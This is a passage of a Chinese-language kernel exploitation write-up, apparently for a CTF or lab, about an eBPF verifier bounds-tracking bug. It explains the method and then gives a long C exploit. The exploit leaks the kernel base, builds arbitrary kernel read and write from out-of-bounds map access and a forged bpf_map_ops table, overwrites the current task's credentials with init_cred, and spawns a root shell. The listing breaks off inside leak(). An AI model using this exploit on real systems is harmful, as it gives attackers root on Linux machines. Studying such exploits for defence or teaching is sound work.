/*
 * In-kernel representation of one BTF object.
 * NOTE(review): the exploit relies on the offset of `id` inside this struct
 * (presumably the value btf_obj_id() returns) -- confirm the layout against
 * the exact kernel version under test.
 */
struct btf {
void *data;
struct btf_type **types;
u32 *resolved_ids;
u32 *resolved_sizes;
const char *strings;
void *nohdr_data;
struct btf_header hdr;
u32 nr_types; /* includes VOID for base BTF */
u32 types_size;
u32 data_size;
refcount_t refcnt;
u32 id;
struct rcu_head rcu;
/* split BTF support */
struct btf *base_btf;
u32 start_id; /* first type ID in this BTF (0 for base BTF) */
u32 start_str_off; /* first string offset (0 for base BTF) */
char name[MODULE_NAME_LEN];
bool kernel_btf;
};
注意到在 bpf_map
当中刚好有一个指向 struct btf
的指针:
bpf_map->btf
在什么时候会被访问到?注意到 bpf
系统调用给我们提供的选项中有一个为 BPF_OBJ_GET_INFO_BY_FD
:
SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr __user *, uattr, unsigned int, size)
{
//...
switch (cmd) {
//...
case BPF_OBJ_GET_INFO_BY_FD:
err = bpf_obj_get_info_by_fd(&attr, uattr);
break;
对于 map 类型而言最终会调用到 bpf_map_get_info_by_fd(),在该函数中会把 bpf_map->btf->id 拷贝给用户空间:
static int bpf_map_get_info_by_fd(struct file *file,
struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr)
{
//...
if (map->btf) {
info.btf_id = btf_obj_id(map->btf);
info.btf_key_type_id = map->btf_key_type_id;
info.btf_value_type_id = map->btf_value_type_id;
}
//...
if (copy_to_user(uinfo, &info, info_len) ||
put_user(info_len, &uattr->info.info_len))
return -EFAULT;
return 0;
}
static int bpf_obj_get_info_by_fd(const union bpf_attr *attr,
union bpf_attr __user *uattr)
{
int ufd = attr->info.bpf_fd;
struct fd f;
int err;
if (CHECK_ATTR(BPF_OBJ_GET_INFO_BY_FD))
return -EINVAL;
f = fdget(ufd);
if (!f.file)
return -EBADFD;
if (f.file->f_op == &bpf_prog_fops)
err = bpf_prog_get_info_by_fd(f.file, f.file->private_data, attr,
uattr);
else if (f.file->f_op == &bpf_map_fops)
err = bpf_map_get_info_by_fd(f.file, f.file->private_data, attr,
uattr);
所以我们可以通过越界写控制 btf
指针完成任意地址读,但是注意每次只能读 4 字节。
这里我们利用任意读遍历 init_task
的 tasks
链表,以 comm
为 tag
进行遍历,从而找到 current_task
越界写实现任意写
注意到 array map 的 map_get_next_key() 定义如下,当 key 小于 map.max_entries - 1 时,key + 1 会被写入到 next_key 当中:
/*
 * Called from syscall.
 *
 * Stores the index that follows *key into *next_key:
 *   - key == NULL or index >= max_entries: *next_key = 0, returns 0
 *   - index == max_entries - 1:            returns -ENOENT, nothing is written
 *   - otherwise:                           *next_key = index + 1, returns 0
 */
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
/* A NULL key is treated as U32_MAX, which takes the "restart at 0" path below. */
u32 index = key ? *(u32 *)key : U32_MAX;
/* The output is written as a single u32. */
u32 *next = (u32 *)next_key;
if (index >= array->map.max_entries) {
*next = 0;
return 0;
}
if (index == array->map.max_entries - 1)
return -ENOENT;
*next = index + 1;
return 0;
}
当然对于常规的调用 map_get_next_key()
的流程而言虽然 key
的内容是可控的但是 next_key
指针不是我们所能控制的:
static int map_get_next_key(union bpf_attr *attr)
{
//...
next_key = kmalloc(map->key_size, GFP_USER);
//...
rcu_read_lock();
err = map->ops->map_get_next_key(map, key, next_key);
但是在 map ops
当中有一些函数可以让我们控制这两个参数,我们可以将这样的函数指针替换为 map_get_next_key()
从而完成任意地址写,例如 map_push_elem()
:
struct bpf_map_ops {
//...
int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);
当我们更新 eBPF map
时,若 map
类型为 BPF_MAP_TYPE_QUEUE
或 BPF_MAP_TYPE_STACK
,则这个函数会被调用:
static int bpf_map_update_value(struct bpf_map *map, struct fd f, void *key,
void *value, __u64 flags)
{
//...
} else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
map->map_type == BPF_MAP_TYPE_STACK) {
err = map->ops->map_push_elem(map, value, flags);
那么这个 fake_ops
伪造在哪里呢?开启 smap
的情况下,我们只能伪造在内核空间。还记得之前泄漏的 map_addr
吗?我们知道 value_addr = map_addr + 0x110
,而 value
中的值用户是可控的,其地址又是知道的,所以 fake_ops
自然就伪造在 value
中了,而 map_type
也是可以直接通过越界写进行修改。注意这里也是只能写 4 字节,并且还要绕过如下限制:
/*
 * Used as the write primitive: one call stores a 4-byte value (index + 1)
 * through next_key. Two checks stand between the caller and that store:
 *   - index >= max_entries writes 0 instead of index + 1
 *   - index == max_entries - 1 returns -ENOENT without writing
 */
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
/* A NULL key is treated as U32_MAX. */
u32 index = key ? *(u32 *)key : U32_MAX;
/* The store below is 32 bits wide. */
u32 *next = (u32 *)next_key;
if (index >= array->map.max_entries) {
*next = 0;
return 0;
}
if (index == array->map.max_entries - 1)
return -ENOENT;
*next = index + 1;
return 0;
}
这里利用越界写直接修改 max_entries = 0xffffffff
。
最后提权时,我直接修改的 current_task 的 cred/real_cred 为 init_cred,但是这里需要注意的是 init_cred 的高 4 字节恒为 0xffffffff,这是无法写入的:要写入 0xffffffff 需要 index = 0xfffffffe,其满足 index == array->map.max_entries - 1,会直接返回 -ENOENT。但是我们可以通过错位写绕过,因为普通用户的 cred/real_cred 是在堆上分配的,其高 2 字节恒为 0xffff,所以我们其实只需要覆盖低 6 字节即可
exp 及效果演示
exp
如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include "bpf_insn.h"
/*
 * Report a fatal error and terminate.
 *
 * Prints msg behind a red "[x] Error at:" banner on stdout, waits two
 * seconds, then exits with EXIT_FAILURE. Does not return.
 */
void err_exit(char *msg)
{
    const unsigned int pause_seconds = 2;

    fprintf(stdout, "\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(pause_seconds);
    exit(EXIT_FAILURE);
}
/* Print msg as a magenta "[+]" progress line on stdout. */
void info(char *msg)
{
    fprintf(stdout, "\033[35m\033[1m[+] %s\n\033[0m", msg);
}
/*
 * Print "msg: value" on stdout, with value shown in hexadecimal with a 0x
 * prefix, behind a green "[+]" marker.
 *
 * value is a size_t, so it is formatted with the matching %zx conversion
 * (the previous %lx only happened to work where size_t is unsigned long).
 */
void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: \033[0m%#zx\n", msg, value);
}
/*
 * Hex + ASCII dump of a memory region to stdout.
 *
 * @desc: optional caption printed first (skipped when NULL)
 * @addr: start of the region
 * @len:  number of bytes to dump; values <= 0 print no rows
 *
 * Each row covers 32 bytes: the row offset, up to four 64-bit words in
 * host byte order, then the printable form of the bytes ('.' for
 * non-printable ones). Only complete 8-byte words are shown in the hex
 * columns, but every byte appears in the ASCII column, so a trailing partial
 * word or partial row is no longer dropped.
 */
void binary_dump(char *desc, void *addr, int len)
{
    const uint8_t *bytes = (const uint8_t *) addr;
    const size_t total = len > 0 ? (size_t) len : 0;

    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }

    for (size_t off = 0; off < total; off += 32) {
        printf(" %04zx", off);

        for (size_t j = 0; j < 4; j++) {
            const size_t word_off = off + j * 8;

            if (word_off + 8 <= total) {
                uint64_t word;

                /* memcpy avoids an unaligned / type-punned load from addr. */
                memcpy(&word, bytes + word_off, sizeof word);
                printf(" 0x%016llx", (unsigned long long) word);
            } else {
                printf(" ");
            }
        }

        printf(" ");
        for (size_t j = 0; j < 32 && off + j < total; j++) {
            printf("%c", isprint(bytes[off + j]) ? bytes[off + j] : '.');
        }
        puts("");
    }
}
/*
 * Root check and shell launcher.
 *
 * When the real UID is 0, announces success, runs /bin/sh via system() and
 * exits with EXIT_SUCCESS once the shell returns. Otherwise prints a failure
 * banner, waits two seconds and exits with EXIT_FAILURE. Never returns.
 */
void get_root_shell(void)
{
    const uid_t uid = getuid();

    if (uid == 0) {
        puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
        puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");
        system("/bin/sh");
        /* leave through exit() so the process ends normally rather than by a segmentation fault */
        exit(EXIT_SUCCESS);
    }

    puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
    sleep(2);
    exit(EXIT_FAILURE);
}
/*
 * Pin the calling process to a single CPU core.
 *
 * @core: index of the CPU to run on
 *
 * The confirmation line is printed only when sched_setaffinity() succeeds;
 * on failure the reason is reported through perror() and the function
 * returns without changing anything else.
 */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);

    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) != 0) {
        perror("sched_setaffinity");
        return;
    }

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}
/*
 * Thin wrapper around the bpf(2) system call.
 *
 * @cmd:  BPF_* command number
 * @attr: command arguments; the full size of union bpf_attr is passed
 *
 * Returns the syscall() result narrowed to int.
 */
static inline int bpf(int cmd, union bpf_attr *attr)
{
    const long rc = syscall(__NR_bpf, cmd, attr, sizeof(*attr));

    return rc;
}
/*
 * Create a BPF map (BPF_MAP_CREATE).
 *
 * @map_type:    BPF_MAP_TYPE_* value
 * @key_size:    size of a key in bytes
 * @value_size:  size of a value in bytes
 * @max_entries: capacity of the map
 *
 * Returns whatever bpf() returns for BPF_MAP_CREATE.
 */
static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries)
{
    union bpf_attr attr;

    /*
     * Clear the whole union explicitly: a partial designated initializer
     * is not guaranteed to zero bytes outside the member being
     * initialized, and unused attr bytes must be zero.
     */
    memset(&attr, 0, sizeof(attr));
    attr.map_type = map_type;
    attr.key_size = key_size;
    attr.value_size = value_size;
    attr.max_entries = max_entries;

    return bpf(BPF_MAP_CREATE, &attr);
}
/*
 * Look up one element of a map (BPF_MAP_LOOKUP_ELEM).
 *
 * @map_fd: file descriptor of the map
 * @key:    pointer to the key to look up
 * @value:  buffer that receives the value
 *
 * Returns whatever bpf() returns for BPF_MAP_LOOKUP_ELEM.
 */
static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{
    union bpf_attr attr;

    /* Zero every byte of the union; unused attr bytes must be zero. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    /* Pointers travel as 64-bit integers; go through uintptr_t. */
    attr.key = (uint64_t)(uintptr_t)key;
    attr.value = (uint64_t)(uintptr_t)value;

    return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}
/*
 * Create or update one element of a map (BPF_MAP_UPDATE_ELEM).
 *
 * @map_fd: file descriptor of the map
 * @key:    pointer to the key
 * @value:  pointer to the new value
 * @flags:  update flags passed through unchanged
 *
 * Returns whatever bpf() returns for BPF_MAP_UPDATE_ELEM.
 */
static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
    union bpf_attr attr;

    /* Zero every byte of the union; unused attr bytes must be zero. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    /* Pointers travel as 64-bit integers; go through uintptr_t. */
    attr.key = (uint64_t)(uintptr_t)key;
    attr.value = (uint64_t)(uintptr_t)value;
    attr.flags = flags;

    return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}
/*
 * Delete one element of a map (BPF_MAP_DELETE_ELEM).
 *
 * @map_fd: file descriptor of the map
 * @key:    pointer to the key to remove
 *
 * Returns whatever bpf() returns for BPF_MAP_DELETE_ELEM.
 */
static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{
    union bpf_attr attr;

    /* Zero every byte of the union; unused attr bytes must be zero. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    /* Pointers travel as 64-bit integers; go through uintptr_t. */
    attr.key = (uint64_t)(uintptr_t)key;

    return bpf(BPF_MAP_DELETE_ELEM, &attr);
}
/*
 * Fetch the key following *key in a map (BPF_MAP_GET_NEXT_KEY).
 *
 * @map_fd:   file descriptor of the map
 * @key:      pointer to the current key
 * @next_key: buffer that receives the following key
 *
 * Returns whatever bpf() returns for BPF_MAP_GET_NEXT_KEY.
 */
static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{
    union bpf_attr attr;

    /* Zero every byte of the union; unused attr bytes must be zero. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    /* Pointers travel as 64-bit integers; go through uintptr_t. */
    attr.key = (uint64_t)(uintptr_t)key;
    attr.next_key = (uint64_t)(uintptr_t)next_key;

    return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}
/*
 * Query a map with BPF_OBJ_GET_INFO_BY_FD and return its btf_id field.
 *
 * @map_fd: file descriptor of the map
 *
 * Returns info.btf_id as filled in by the kernel, or 0 when the syscall
 * fails. The info buffer is zeroed first, so no indeterminate stack bytes are
 * handed to the kernel or returned to the caller.
 */
static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
    struct bpf_map_info info;
    union bpf_attr attr;

    memset(&info, 0, sizeof(info));
    /* Zero every byte of the union; unused attr bytes must be zero. */
    memset(&attr, 0, sizeof(attr));
    attr.info.bpf_fd = map_fd;
    attr.info.info_len = sizeof(info);
    /* Pointers travel as 64-bit integers; go through uintptr_t. */
    attr.info.info = (uint64_t)(uintptr_t)&info;

    if (bpf(BPF_OBJ_GET_INFO_BY_FD, &attr) < 0) {
        return 0;
    }

    return info.btf_id;
}
/* Global exploit state. */
/* NOTE(review): sockets[] and prog_fd are not referenced in the visible part of the file. */
int sockets[2];
/*
 * Map file descriptors. prog[] hard-codes fd 3 (commented as map_fd) and
 * fd 4 (commented as expmap_fd) in its BPF_LD_MAP_FD instructions.
 */
int map_fd;
int expmap_fd;
int prog_fd;
/* Scratch key and value buffers for map operations. */
uint32_t key;
uint64_t* value1;
uint64_t* value2;
/*
 * Hard-coded kernel symbol addresses.
 * NOTE(review): presumably the un-slid addresses from the test kernel's
 * symbol table ("D" looks like the nm symbol type) -- regenerate for any
 * other kernel build.
 */
uint64_t array_map_ops = 0xffffffff8226d900;
uint64_t init_cred = 0xffffffff82893a00; // D init_cred
uint64_t init_task = 0xffffffff82816080; // D init_task
uint64_t init_nsproxy = 0xffffffff82893720; // D init_nsproxy
/* Leak results; -1 presumably means "not leaked yet" -- TODO confirm against the code that fills them. */
uint64_t map_addr = -1;
uint64_t koffset = -1;
uint64_t kbase = -1;
/* Eight bytes that spell "XiaozaYa" when stored little-endian; per the write-up, matched against task comm. */
uint64_t tag = 0x6159617a6f616958;
uint64_t current_task;
/*
 * Socket-filter program loaded by prep() and executed by trigger().
 *
 * NOTE: the two BPF_LD_MAP_FD instructions hard-code descriptors 3 and 4, so
 * map_fd and expmap_fd must have exactly those values when the program is
 * loaded.
 *
 * Inputs, read from element 0 of the first map (value_buf1):
 *   [0] scalar pushed through the bounds checks (callers store 2)
 *   [1] if non-zero, stored at r7 + 0x40
 *   [2] if non-zero, stored at r7 + 0, and the 32-bit words at r7 + 0x18,
 *       r7 + 0x24 and r7 + 0x2c are rewritten
 * Outputs, written back into value_buf1:
 *   [3] qword read from r7 + 0
 *   [4] qword read from r7 + 0xc0
 * where r7 = value_buf2 - r6, and r6 evaluates to 0x110 at run time when
 * value_buf1[0] == 2.
 */
struct bpf_insn prog[] = {
BPF_LD_MAP_FD(BPF_REG_1, 3), // r1 = map with fd 3 (expected to be map_fd) = bpf_map ptr1
BPF_MOV64_IMM(BPF_REG_6, 0), // r6 = 0
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), // *(uint64_t*)(fp - 8) = r6 = 0 (lookup key)
BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8
BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr1, r2 = fp - 8
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 != 0 (lookup succeeded) goto pc+1
BPF_EXIT_INSN(), // exit
BPF_MOV64_REG(BPF_REG_9, BPF_REG_0), // r9 = r0 = value_buf1 ptr
BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_9, 0), // r6 = *(uint64_t*)r9 = value_buf1[0] (2 at run time)
BPF_MOV64_IMM(BPF_REG_0, 0), // r0 = 0
BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 1, 1), // if r6 >= 1 goto pc+1 ==> raises reg6.umin_value
BPF_EXIT_INSN(), // exit
BPF_MOV64_IMM(BPF_REG_8, 1), // r8 = 1
BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), // r8 = r8 << 32 = 1 << 32 = 0x1 0000 0000
BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 1), // r8 = r8 + 1 = 0x1 0000 0001
BPF_JMP_REG(BPF_JLE, BPF_REG_6, BPF_REG_8, 1), // if r6 <= r8 goto pc+1 ==> set reg6.umax_value = 0x1 0000 0001
BPF_EXIT_INSN(), // exit
// BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_JMP32_IMM(BPF_JNE, BPF_REG_6, 5, 1), // if (u32)r6 != 5 goto pc+1 ==> 32-bit compare that triggers the bug
// BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(), // exit
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2), // r6 = r6 & 2 (run time: 2 & 2 = 2)
BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1), // r6 = r6 >> 1 (run time: 2 >> 1 = 1)
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110), // r6 = r6 * 0x110 (run time: 1 * 0x110 = 0x110)
BPF_LD_MAP_FD(BPF_REG_1, 4), // r1 = map with fd 4 (expected to be expmap_fd) = bpf_map ptr2
BPF_MOV64_IMM(BPF_REG_8, 0), // r8 = 0
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8), // *(uint64_t*)(fp - 8) = r8 = 0 (lookup key)
BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8
BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr2, r2 = fp - 8
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 != 0 (lookup succeeded) goto pc+1
BPF_EXIT_INSN(), // exit
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // r7 = r0 = value_buf2 addr
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6), // r7 = r7 - r6 = value_buf2 addr - 0x110 (run time)
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), // r8 = *(uint64_t*)r7 = value_buf2[-0x110/8] = array_map_ops
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x18), // *(uint64_t*)(r9 +0x18) = value_buf1[3] = r8 = array_map_ops
BPF_MOV64_REG(BPF_REG_2, BPF_REG_8), // r2 = r8 = array_map_ops
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0xc0), // r8 = *(uint64_t*)(r7 +0xc0) = value_buf2[-(0x110-0xc0)/8]; leak() derives map_addr from it
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x20), // *(uint64_t*)(r9 +0x20) = value_buf1[4] = r8
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 8), // r8 = *(uint64_t*)(r9 +8) = value_buf1[1] = arb_read addr
BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 1), // if arb_read addr == 0 goto pc+1 (skip the store below)
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0x40), // *(uint64_t*)(r7 +0x40) = value_buf2[-(0x110-0x40)/8] = btf = r8
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0x10), // r8 = value_buf1[2] = fake_ops
BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 4), // if fake_ops == 0 goto pc+4 (skip the four stores below)
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), // expmap's bpf_map_ops = r8 = fake_ops
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x18, BPF_MAP_TYPE_STACK), // map_type = BPF_MAP_TYPE_STACK
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x24, -1), // max_entries = -1
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x2c, 0), // spin_lock_off = 0
BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0), // r0 = 0 (program return value)
BPF_EXIT_INSN(), // exit
};
/* Size in bytes of the buffer handed to the kernel for verifier log output. */
#define BPF_LOG_SZ 0x10000
/* Receives the verifier log; prep() prints it when BPF_PROG_LOAD fails. */
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };
/* BPF_PROG_LOAD request describing prog[] as a GPL-licensed socket filter. */
union bpf_attr attr = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insns = (uint64_t) &prog,
.insn_cnt = sizeof(prog) / sizeof(prog[0]), // number of instructions, not bytes
.license = (uint64_t) "GPL",
.log_level = 1,
.log_buf = (uint64_t) bpf_log_buf,
.log_size = BPF_LOG_SZ,
};
/* Switch stdin, stdout and stderr to unbuffered mode. */
void init() {
    FILE *streams[] = { stdin, stdout, stderr };
    size_t count = sizeof(streams) / sizeof(streams[0]);

    for (size_t i = 0; i < count; i++) {
        setbuf(streams[i], NULL);
    }
}
/*
 * Send one 64-byte datagram on sockets[0].
 *
 * prep() attaches the BPF program to the peer socket sockets[1], so this
 * write is what causes the program to run. The payload content is
 * irrelevant; it is zero-filled so that no uninitialized stack bytes are
 * sent. A failed write is reported but not treated as fatal.
 */
void trigger() {
    char buffer[64] = { 0 };

    if (write(sockets[0], buffer, sizeof(buffer)) < 0) {
        perror("write");
    }
}
/*
 * One-time setup: allocate the two staging buffers, set the process name,
 * create both array maps, load the BPF program and attach it to one end of
 * a UNIX datagram socket pair.
 *
 * NOTE: prog[] hard-codes map descriptors 3 and 4, so this function relies
 * on map_fd and expmap_fd receiving exactly those numbers.
 *
 * Every failure is reported through perror() followed by err_exit().
 */
void prep() {
    value1 = calloc(0x1000, 1);
    value2 = calloc(0x1000, 1);
    if (value1 == NULL || value2 == NULL) {
        perror("calloc");
        err_exit("calloc");
    }

    /* leak() later searches for this name, encoded as the global `tag`. */
    prctl(PR_SET_NAME, "XiaozaYa");

    map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x100, 1);
    if (map_fd < 0) {
        perror("BPF_MAP_CREATE");
        err_exit("BPF_MAP_CREATE");
    }

    expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x200, 1);
    if (expmap_fd < 0) {
        perror("BPF_MAP_CREATE");
        err_exit("BPF_MAP_CREATE");
    }

    prog_fd = bpf(BPF_PROG_LOAD, &attr);
    if (prog_fd < 0) {
        /* Show the verifier log before reporting the failure. */
        puts(bpf_log_buf);
        perror("BPF_PROG_LOAD");
        err_exit("BPF_PROG_LOAD");
    }

    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0) {
        perror("socketpair()");
        err_exit("socketpair()");
    }

    if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0) {
        /* The original reported this failure as a socketpair() error. */
        perror("setsockopt SO_ATTACH_BPF");
        err_exit("setsockopt()");
    }
}
/*
 * Read a 32-bit value associated with `addr` via the map-info query.
 *
 * Stages the inputs for the BPF program, runs it once, and returns whatever
 * bpf_map_get_info_by_fd() reports for expmap_fd.
 */
uint32_t arb_read_4_byte(uint64_t addr) {
value1[0] = 2; // scalar the program pushes through its bounds checks
value1[1] = addr - 0x58; // non-zero => program stores it at r7 + 0x40; the 0x58 bias presumably matches the offset of the field the info query reads -- TODO confirm
value1[2] = 0; // zero => program skips the ops/type/max_entries rewrite
bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
trigger();
return bpf_map_get_info_by_fd(expmap_fd);
}
/*
 * Compose a 64-bit value from two 32-bit reads: the word at `addr` becomes
 * the low half and the word at `addr + 4` the high half.
 */
uint64_t arb_read(uint64_t addr) {
    uint64_t result = arb_read_4_byte(addr);

    result |= (uint64_t)arb_read_4_byte(addr + 4) << 32;
    return result;
}
/*
 * Stage a replacement operations table inside expmap's value and run the
 * BPF program once with value1[2] set, which makes the program take its
 * "rewrite" branch (stores at r7 + 0, +0x18, +0x24 and +0x2c).
 *
 * The table holds addresses for one specific kernel build; every non-zero
 * entry is rebased by koffset. Its slot layout presumably mirrors the
 * target kernel's struct bpf_map_ops -- verify against that kernel.
 *
 * Requires leak() to have run first (uses koffset and map_addr).
 */
void prep_arb_write() {
    value1[0] = 2;
    value1[1] = 0;
    /*
     * The program addresses expmap's value as r7 + 0x110, and the table is
     * copied to the start of that value below, so this points 0x20 bytes
     * (four slots) into the copied table.
     */
    value1[2] = map_addr+0x110+0x20;

    uint64_t fake_ops[] = {
        0x0,0x0,0x0,0x0,
        0xffffffff812677b0,
        0xffffffff81268830,
        0x0,
        0xffffffff81267df0,
        0xffffffff812678a0,
        0x0,0x0,
        0xffffffff8124a150,
        0x0,
        0xffffffff81249f20,
        0x0,
        0xffffffff81267930,
        0xffffffff81267c70,
        0xffffffff81267780,
        0xffffffff812678a0,
        0x0,0x0,0x0,0x0,
        0xffffffff81268340,
        0x0,
        0xffffffff81267a10,
        0xffffffff81268640,
        0x0,0x0,0x0,
        0xffffffff81267830,
        0xffffffff81267860,
        0xffffffff812679d0
    };

    /* Rebase only populated slots; empty slots must stay 0. */
    for (size_t i = 0; i < sizeof(fake_ops) / sizeof(fake_ops[0]); i++) {
        if (fake_ops[i]) {
            fake_ops[i] += koffset;
        }
    }

    memcpy(value2, fake_ops, sizeof(fake_ops));
    bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
    bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
    trigger();
}
/*
 * 32-bit write primitive built on a map update against expmap_fd.
 *
 * Only meaningful after prep_arb_write() has run. Note that `addr` is
 * passed in the position where the other callers pass BPF_ANY (the flags
 * argument), and that the value staged is val - 1, not val.
 */
void arb_write_4_byte(uint64_t addr, uint32_t val) {
value2[0] = val - 1; // presumably the substituted handler stores (input + 1) -- TODO confirm against the write-primitive analysis
bpf_map_update_elem(expmap_fd, &key, value2, addr); // addr travels as the "flags" argument
}
/*
 * Store a 64-bit value as two 32-bit writes: low half at `addr`, then the
 * high half at `addr + 4`.
 */
void arb_write(uint64_t addr, uint64_t val) {
    const uint32_t halves[2] = { (uint32_t)val, (uint32_t)(val >> 32) };

    for (int i = 0; i < 2; i++) {
        arb_write_4_byte(addr + 4 * (uint64_t)i, halves[i]);
    }
}
/*
 * Run the BPF program once in "read only" mode (value1[1] == value1[2] == 0),
 * derive koffset / kbase / map_addr from the two qwords it writes back into
 * map_fd's value, rebase the hard-coded symbol addresses, and then walk a
 * linked list starting at init_task until an entry whose name field equals
 * `tag` is found. The result is left in the global current_task.
 *
 * Calls err_exit() if the leaked pointer does not look like array_map_ops,
 * or if the walk returns to init_task without a match (the original looped
 * forever in that case).
 */
void leak() {
    uint64_t buf[0x200/8];

    value1[0] = 2;
    value1[1] = 0;
    value1[2] = 0;
    bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
    bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
    trigger();

    memset(buf, 0, sizeof(buf));
    bpf_map_lookup_elem(map_fd, &key, buf);
    // binary_dump("LEAK DATA", buf, 0x100);

    /*
     * buf[3] is the qword the program read at r7 + 0. Accept it only if the
     * upper 32 bits are all ones and the low 12 bits match those of the
     * hard-coded array_map_ops address (0x900).
     */
    if ((buf[3] & 0xffffffff00000fff) == 0xffffffff00000900) {
        koffset = buf[3] - array_map_ops;
        kbase = 0xffffffff81000000 + koffset;
        map_addr = buf[4] - 0xc0; /* buf[4] is the qword the program read at r7 + 0xc0 */
        hexx("koffset", koffset);
        hexx("kbase", kbase);
        hexx("map_addr", map_addr);
    }
    if (koffset == (uint64_t)-1) err_exit("FAILED to leak kernel base");

    array_map_ops += koffset;
    init_cred += koffset;
    init_task += koffset;
    init_nsproxy += koffset;
    hexx("init_cred", init_cred);
    hexx("init_task", init_task);
    hexx("init_nsproxy", init_nsproxy);

    /*
     * Offsets are specific to the target kernel build: 0xa58 is compared
     * against the process-name tag, and 0x7a8 / 0x7a0 are presumably a link
     * field and the offset of its containing list head -- TODO confirm.
     */
    current_task = init_task;
    for (;;) {
